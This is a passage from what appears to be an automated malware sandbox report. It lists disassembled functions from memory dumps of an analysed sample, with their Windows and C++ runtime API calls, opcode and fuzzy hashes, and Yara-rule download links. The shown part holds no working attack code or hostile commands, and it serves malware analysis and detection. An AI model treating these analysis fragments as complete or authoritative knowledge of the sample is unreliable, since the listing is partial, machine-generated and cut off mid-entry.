                                                                                                                          0x04cd1a0b
                                                                                                                          0x04cd1a16
                                                                                                                          0x04cd1a16
                                                                                                                          0x04cd1a21

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD43A8: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,04CD198E,253D7325,00000000,00000000,745EC740,?,?,04CD4653,?), ref: 04CD440F
                                                                                                                            • Part of subcall function 04CD43A8: sprintf.NTDLL ref: 04CD4430
                                                                                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04CD4653,?,058B95B0), ref: 04CD199F
                                                                                                                          • lstrlen.KERNEL32(?,?,?,04CD4653,?,058B95B0), ref: 04CD19A7
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • strcpy.NTDLL ref: 04CD19BE
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 04CD19C9
                                                                                                                            • Part of subcall function 04CD5601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04CD19D8,00000000,?,?,?,04CD4653,?,058B95B0), ref: 04CD5618
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04CD4653,?,058B95B0), ref: 04CD19E6
                                                                                                                            • Part of subcall function 04CD756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04CD19F2,00000000,?,?,04CD4653,?,058B95B0), ref: 04CD7578
                                                                                                                            • Part of subcall function 04CD756E: _snprintf.NTDLL ref: 04CD75D6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                          • String ID: =
                                                                                                                          • API String ID: 2864389247-1428090586
                                                                                                                          • Opcode ID: a4e5c99049cc9d6a39d5836708fb3a69e912421a4d0354aa1b4c2c0946cc9b38
                                                                                                                          • Instruction ID: 9cec96b379794102a93e339e37271d0256a8c196444c1b5468e36a16ee588804
                                                                                                                          • Opcode Fuzzy Hash: a4e5c99049cc9d6a39d5836708fb3a69e912421a4d0354aa1b4c2c0946cc9b38
                                                                                                                          • Instruction Fuzzy Hash: E111E937902625779712BBB48CC4C6F37AFDE856687094126F709EB200DE34FD02A7A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E33D196: _free.LIBCMT ref: 6E33D1BB
                                                                                                                          • _free.LIBCMT ref: 6E33D4F9
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33D504
                                                                                                                          • _free.LIBCMT ref: 6E33D50F
                                                                                                                          • _free.LIBCMT ref: 6E33D563
                                                                                                                          • _free.LIBCMT ref: 6E33D56E
                                                                                                                          • _free.LIBCMT ref: 6E33D579
                                                                                                                          • _free.LIBCMT ref: 6E33D584
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                          • Instruction ID: 1c775a92a51b382890f9de72f61c385eb80da3d32ce688500c37143a9a4e3282
                                                                                                                          • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                          • Instruction Fuzzy Hash: 2A118E31951BA4ABE660ABF0CC05FCB77BDAF00708FD04D14E2DBA6052DB35F5188AA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F67FA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocstr$Maklocchr
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 2020259771-711905790
                                                                                                                          • Opcode ID: 5715afb7dd833c9ab8a1d7bd1d9ed5f586bdbe744dc4d6958643cb0641373ccb
                                                                                                                          • Instruction ID: 44fdaad62bf1ba765888c7cf57a7af8276d4cc1be8088f3e8da6d75041238d82
                                                                                                                          • Opcode Fuzzy Hash: 5715afb7dd833c9ab8a1d7bd1d9ed5f586bdbe744dc4d6958643cb0641373ccb
                                                                                                                          • Instruction Fuzzy Hash: C1118CB1990749BFE720CBE5D890F52F7ACEF08614F04892AF244CB640D3A5F95687E4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1C96, Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1C9D
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1CA7
                                                                                                                          • int.LIBCPMT ref: 6E2F1CBE
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F1CE1
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1CF8
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1D18
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1D25
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          • Opcode ID: ed62022c4a3d4973d3804e374bc9a9f4b5258df4367cded4524c1fb11d1d0cee
                                                                                                                          • Instruction ID: dc030ce16e7f019918c1874105f01bca27bf6eacca2a3cc1084a8cedd421c046
                                                                                                                          • Opcode Fuzzy Hash: ed62022c4a3d4973d3804e374bc9a9f4b5258df4367cded4524c1fb11d1d0cee
                                                                                                                          • Instruction Fuzzy Hash: D311E0B694011ECBCF01DBE4C954BEDF7BAAF46318F644908D4106B281DF749947CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F760E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7615
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F761F
                                                                                                                          • int.LIBCPMT ref: 6E2F7636
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7659
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7670
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7690
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F769D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: 2d2c9ead8b5d08dd4f2804e0d0b800f8b9a73c6c1f052ab573b1c80bcd82dbd9
                                                                                                                          • Instruction ID: feb0711a4f26171065421143660aa5e74c0ead1d9278157970b144ef225e1303
                                                                                                                          • Opcode Fuzzy Hash: 2d2c9ead8b5d08dd4f2804e0d0b800f8b9a73c6c1f052ab573b1c80bcd82dbd9
                                                                                                                          • Instruction Fuzzy Hash: C901ED7A84011EDBCF01DBE8C854AEEF7BBAF85328F250819D4116B2C0DF7099468B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F76A3, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F76AA
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F76B4
                                                                                                                          • int.LIBCPMT ref: 6E2F76CB
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F76EE
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7705
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7725
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7732
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: 0c694bced1b854ab9ac9bbb71301d8ccadba942549df713ff02291a0cc47124d
                                                                                                                          • Instruction ID: 2485fe04350a337dd3526895c08f5e5d9e0543972f7db0376a5239c41dc83713
                                                                                                                          • Opcode Fuzzy Hash: 0c694bced1b854ab9ac9bbb71301d8ccadba942549df713ff02291a0cc47124d
                                                                                                                          • Instruction Fuzzy Hash: F701AD7A99051EDBCF01DBE4C954AEEF7BBAF86328F150809D8116B280DF709907CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7738, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F773F
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7749
                                                                                                                          • int.LIBCPMT ref: 6E2F7760
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7783
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F779A
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F77BA
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F77C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: 8e3467f39db19a354c7454f66d08effc2158c2688d542488c51830b629efc314
                                                                                                                          • Instruction ID: d15846af9ef75ffae30640608132a29f4147f921fb5d6eeb0343ceb669aedce5
                                                                                                                          • Opcode Fuzzy Hash: 8e3467f39db19a354c7454f66d08effc2158c2688d542488c51830b629efc314
                                                                                                                          • Instruction Fuzzy Hash: D701ED7A85011ECBCF01DBE4C954AEEF7BBAF49318F100809D8116B290DF709A068790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F6F12, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F6F19
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F6F23
                                                                                                                          • int.LIBCPMT ref: 6E2F6F3A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F6F5D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F6F74
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F6F94
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F6FA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          • Opcode ID: d740a2879b316c91fb22ee085e8c72e2f1b26c1970e2ad0f68978f64f0ad0c2a
                                                                                                                          • Instruction ID: 6a7909e63cdca022f7b07edfeda72980f781592a60884d48788f4d4456bb46de
                                                                                                                          • Opcode Fuzzy Hash: d740a2879b316c91fb22ee085e8c72e2f1b26c1970e2ad0f68978f64f0ad0c2a
                                                                                                                          • Instruction Fuzzy Hash: F101007A94011ECBCF01DBE4CAA4BEEF7BBAF85328F100909D4126B290DF749D028781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F6FA7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F6FAE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F6FB8
                                                                                                                          • int.LIBCPMT ref: 6E2F6FCF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F6FF2
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7009
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7029
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7036
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          • Opcode ID: ea941aed54d070b9e9ec109516b3b8d4586d45c21c052e6ff687c6cef66e8b7a
                                                                                                                          • Instruction ID: 792b636008de3f7cd69edd31434ad5e9818465f2f8eb8d3e20f63d8767550406
                                                                                                                          • Opcode Fuzzy Hash: ea941aed54d070b9e9ec109516b3b8d4586d45c21c052e6ff687c6cef66e8b7a
                                                                                                                          • Instruction Fuzzy Hash: D301ED7A88051EDBCF01EBE4D954AFEBBBBAF45318F100909E4116B280DF709907C780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F77CD, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F77D4
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F77DE
                                                                                                                          • int.LIBCPMT ref: 6E2F77F5
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7818
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F782F
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F784F
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F785C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: dbe8bcba65ee986e95c3c207c83416de0c8f6c89ac381038628d903a733222d5
                                                                                                                          • Instruction ID: 529835f497a5421be0e94609878f87cd15eb1a4d75922579d679b62cbf2f7461
                                                                                                                          • Opcode Fuzzy Hash: dbe8bcba65ee986e95c3c207c83416de0c8f6c89ac381038628d903a733222d5
                                                                                                                          • Instruction Fuzzy Hash: A901ED7A84011ECBCF01DBE4D954AEEB77BBF41718F110819D8216B280DF709902CB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1A42, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1A49
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1A53
                                                                                                                          • int.LIBCPMT ref: 6E2F1A6A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F1A8D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1AA4
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1AC4
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1AD1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          • Opcode ID: 285a8a56ab1be7439065713a39866bb9877a0435c1c09aba81870aff09069993
                                                                                                                          • Instruction ID: 767043b1ef7f344200bc2199173328a9dce99d4807abeab28dbacd0eff5c1b44
                                                                                                                          • Opcode Fuzzy Hash: 285a8a56ab1be7439065713a39866bb9877a0435c1c09aba81870aff09069993
                                                                                                                          • Instruction Fuzzy Hash: 4D0100BA98051EDBCF01DBE4D854AEEF7BBAF45328F640809D4116B280DF709D86C780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7AB6, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7ABD
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7AC7
                                                                                                                          • int.LIBCPMT ref: 6E2F7ADE
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F7B01
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7B18
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7B38
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7B45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          • Opcode ID: e193c82f857ac928fc6446e7a0b30d7dfe8ae23faa0a0e477e2f7c1568a11c81
                                                                                                                          • Instruction ID: 2137a4ebee082e0e9dab90be3e008305c7f260dac0d92f4e0a7fe59f87798f7f
                                                                                                                          • Opcode Fuzzy Hash: e193c82f857ac928fc6446e7a0b30d7dfe8ae23faa0a0e477e2f7c1568a11c81
                                                                                                                          • Instruction Fuzzy Hash: 6B01AD7A94051EDBCF01EBF4C954AEEF77BAF86318F250909D4116B280EF709A478791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7290, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7297
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F72A1
                                                                                                                          • int.LIBCPMT ref: 6E2F72B8
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E2F72DB
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F72F2
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7312
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F731F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 958335874-0
                                                                                                                          • Opcode ID: 98c6a35e386c66cf34e3fb3f17fc04528cce9c88570bc62589555434025cc460
                                                                                                                          • Instruction ID: 72b7384913898d502c1b2b3e1c96e5031b407dff50c11a521cb39d43cb1e8d3a
                                                                                                                          • Opcode Fuzzy Hash: 98c6a35e386c66cf34e3fb3f17fc04528cce9c88570bc62589555434025cc460
                                                                                                                          • Instruction Fuzzy Hash: DB01AD7A94451EDBCF01DBE4C955AEEF77BAF81718F240809D8116B280DF709A46C791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1AD7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1ADE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1AE8
                                                                                                                          • int.LIBCPMT ref: 6E2F1AFF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F1B22
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1B39
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1B59
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1B66
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958136301-0
                                                                                                                          • Opcode ID: 6510a517716be358dab3e3edadef4eae94c873e64bbd057d87c2b875f4cd9c22
                                                                                                                          • Instruction ID: 9b9290b9ac8316961b579496d34a9b8ce2b527553900f11380a2eb1fdef35aa2
                                                                                                                          • Opcode Fuzzy Hash: 6510a517716be358dab3e3edadef4eae94c873e64bbd057d87c2b875f4cd9c22
                                                                                                                          • Instruction Fuzzy Hash: 900104BA94051EDBCF01DBE4C554AEEF77BAF41314F500809D4116B280EF709E878790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7325, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F732C
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7336
                                                                                                                          • int.LIBCPMT ref: 6E2F734D
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E2F7370
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7387
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F73A7
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F73B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 958335874-0
                                                                                                                          • Opcode ID: 7770f8acb1258f4349d603d1da056a08da19e7e7e4a0c4bf082ca5e4e895ccf1
                                                                                                                          • Instruction ID: ccd13ef33be2d6215b0ebfbf53f2954a3f45614b1270aed55f91f8339afe1dc9
                                                                                                                          • Opcode Fuzzy Hash: 7770f8acb1258f4349d603d1da056a08da19e7e7e4a0c4bf082ca5e4e895ccf1
                                                                                                                          • Instruction Fuzzy Hash: 3901ED7A98011EDBCF01DBE8C954AEEF7BBAF41318F11080AD8116B280DF709A068780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7B4B, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7B52
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7B5C
                                                                                                                          • int.LIBCPMT ref: 6E2F7B73
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F7B96
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7BAD
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7BCD
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7BDA
                                                                                                                          Memory Dump Source
